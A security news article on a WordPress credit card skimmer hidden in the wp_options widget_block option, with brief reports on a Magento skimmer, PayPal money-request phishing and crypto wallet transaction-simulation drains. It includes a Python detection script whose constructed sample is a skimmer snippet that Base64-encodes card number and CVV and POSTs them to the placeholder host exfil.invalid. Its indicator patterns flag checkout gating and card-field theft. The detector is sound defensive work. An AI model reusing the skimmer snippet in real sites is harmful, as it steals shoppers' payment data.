Cybersecurity researchers are warning about a new stealth credit card skimmer campaign that targets WordPress e-commerce sites by inserting malicious JavaScript code into a database table belonging to the content management system (CMS).
“This credit card skimmer malware targeting WordPress websites silently injects malicious JavaScript into database records to steal sensitive payment details,” Sucuri researcher Pooja Srivastava said in a new analysis.
“The malware is activated specifically on checkout pages, either by hijacking existing payment fields or by entering a fake credit card form.”
The GoDaddy-owned website security company says it found the malware embedded in the WordPress wp_options table under the “widget_block” option, a location that lets it evade scanning tools and persist on compromised sites without attracting attention.
The injection is carried out through an HTML block widget added via the WordPress admin panel (wp-admin > Widgets), which stores the attacker's JavaScript in that option.
The JavaScript code first checks whether the current page is a checkout page and fires only once the site visitor is about to enter their payment details, at which point it dynamically creates a fake payment screen that mimics legitimate payment processors like Stripe.
The form is designed to record users’ credit card numbers, expiration dates, CVV numbers, and payment information. Alternatively, the script is also capable of capturing data entered into legitimate payment forms in real time for maximum compatibility.
The stolen data is then Base64-encoded and encrypted with AES-CBC so that it appears harmless and resists analysis. In the final step, it is transferred to a server controlled by the attacker (“valhafather(.)xyz” or “fqbe23(.)xyz”).
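As an added example (not Sucuri's tooling), the Python check below scans the serialized `widget_block` value from a `wp_options` export for HTML block widgets that embed a script and carry the traits described above: checkout-only activation, Base64/AES handling, card-field harvesting, and calls to a host other than the shop's own. The sample option value, the indicator patterns and the host `exfil.invalid` are constructed for illustration.

```python
"""Flag skimmer-style scripts in the WordPress widget_block option (wp_options)."""
import re
# Traits the article attributes to the skimmer, as loose indicator patterns.
INDICATORS = {
    "checkout_gate": re.compile(r"checkout|order-pay", re.I),
    "encoding": re.compile(r"\b(atob|btoa|CryptoJS|AES)\b"),
    "card_fields": re.compile(r"card_?number|cvv|exp(?:iry|iration)", re.I),
}
SCRIPT_RX = re.compile(r"<script\b", re.I)
PHP_STR_RX = re.compile(rb's:(\d+):"')
HOST_RX = re.compile(r"https?://([a-z0-9.-]+)", re.I)

def extract_php_strings(serialized: bytes) -> list[str]:
    """Return every s:<len>:"..." value from a PHP-serialized blob."""
    # PHP lengths are byte counts, so slice by length; quote matching would break on the widget's HTML/JS.
    values, pos = [], 0
    while (m := PHP_STR_RX.search(serialized, pos)):
        n, start = int(m.group(1)), m.end()
        values.append(serialized[start:start + n].decode("utf-8", "replace"))
        pos = start + n + 2  # step over the closing quote and semicolon
    return values

def scan_widget_block(option_value: bytes, site_host: str) -> list[dict]:
    """One finding per widget whose content embeds a <script> tag."""
    findings = []
    for content in extract_php_strings(option_value):
        if not SCRIPT_RX.search(content):
            continue  # plain HTML blocks are not interesting here
        hits = [name for name, rx in INDICATORS.items() if rx.search(content)]
        hosts = {h.lower() for h in HOST_RX.findall(content)}
        foreign = sorted(h for h in hosts if h != site_host.lower())
        if foreign:  # script talks to a host other than the shop itself
            hits.append("external_url")
        findings.append({"indicators": hits, "external_hosts": foreign})
    return findings

def php_str(s: str) -> bytes:  # serialize one PHP string; builds the constructed sample
    b = s.encode()
    return b's:%d:"%s";' % (len(b), b)

# Constructed wp_options row: widget 2 is an ordinary HTML block, widget 3 a
# skimmer-like script posting to a placeholder host (exfil.invalid is not real).
BENIGN = '<!-- wp:html --><p>Free shipping! <a href="https://shop.example/faq">FAQ</a></p><!-- /wp:html -->'
MALICIOUS = ('<!-- wp:html --><script>if(location.pathname.includes("checkout")){'
             'var d=btoa(JSON.stringify({cardNumber:n,cvv:c}));'
             'fetch("https://exfil.invalid/c",{method:"POST",body:d});}</script><!-- /wp:html -->')
SAMPLE_OPTION_VALUE = (b'a:3:{i:2;a:1:{s:7:"content";' + php_str(BENIGN) + b'}'
                       b'i:3;a:1:{s:7:"content";' + php_str(MALICIOUS) + b'}'
                       b's:12:"_multiwidget";i:1;}')
```

Run `scan_widget_block(SAMPLE_OPTION_VALUE, "shop.example")` against a real export of `SELECT option_value FROM wp_options WHERE option_name = 'widget_block'`; any widget with an inline script is worth a manual look, and several indicators together plus a foreign host warrants treating the site as compromised.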
The development comes more than a month after Sucuri highlighted a similar campaign that used JavaScript malware to dynamically generate fake credit card forms or extract data entered into payment fields on checkout pages.
The collected information is then subjected to three layers of obfuscation: it is first JSON-encoded, then XOR-encrypted with the key “script”, and finally Base64-encoded before being sent to the remote server (“staticfonts(.)com”).
“The script is designed to extract sensitive credit card information from certain fields on the checkout page,” Srivastava noted. “The malware then collects additional user data through the Magento API, including username, address, email address, phone number and other payment information. This data is extracted using Magento’s customer and quote data models.”
The disclosure also follows the discovery of a financially motivated phishing email campaign that tricks recipients into clicking through to PayPal login pages under the guise of an outstanding payment request for nearly $2,200.
“It appears that the scammer simply registered a Microsoft 365 test domain, which is free for three months, and then created a mailing list (Billingdepartments1(@)gkjyryfjy876.onmicrosoft.com) containing victims’ emails,” said Carl Windsor of Fortinet FortiGuard Labs. “On PayPal’s web portal, they just ask for money and add a mailing list as an address.”
What makes the campaign insidious is that the messages originate from a legitimate PayPal address (service@paypal.com) and contain a valid PayPal URL, which allows the email to slip past security tools.
To make matters worse, once a victim logs in to their PayPal account to look into the payment request, their account is automatically linked to the email address on the mailing list, allowing the threat actor to take control of the account.
In recent weeks, attackers have also been observed abusing a wallet feature called transaction simulation to steal cryptocurrency from victims’ wallets.
“Modern Web3 wallets include transaction simulation as a convenient feature,” Scam Sniffer said. “This capability allows users to preview the expected outcome of their transactions before signing them. Although designed to improve transparency and user experience, attackers have found ways to exploit this mechanism.”
The attack exploits the time gap between the simulation and the actual on-chain execution of a transaction: attackers set up fake sites that mimic decentralized applications (DApps), so that a transaction which previews as harmless drains the wallet when it is executed.
“This new attack vector represents a significant evolution in phishing techniques,” the Web3 anti-fraud solutions provider said. “Instead of relying on simple deception, attackers are now leveraging robust wallet features that users rely on for security. This sophisticated approach makes detection particularly challenging.”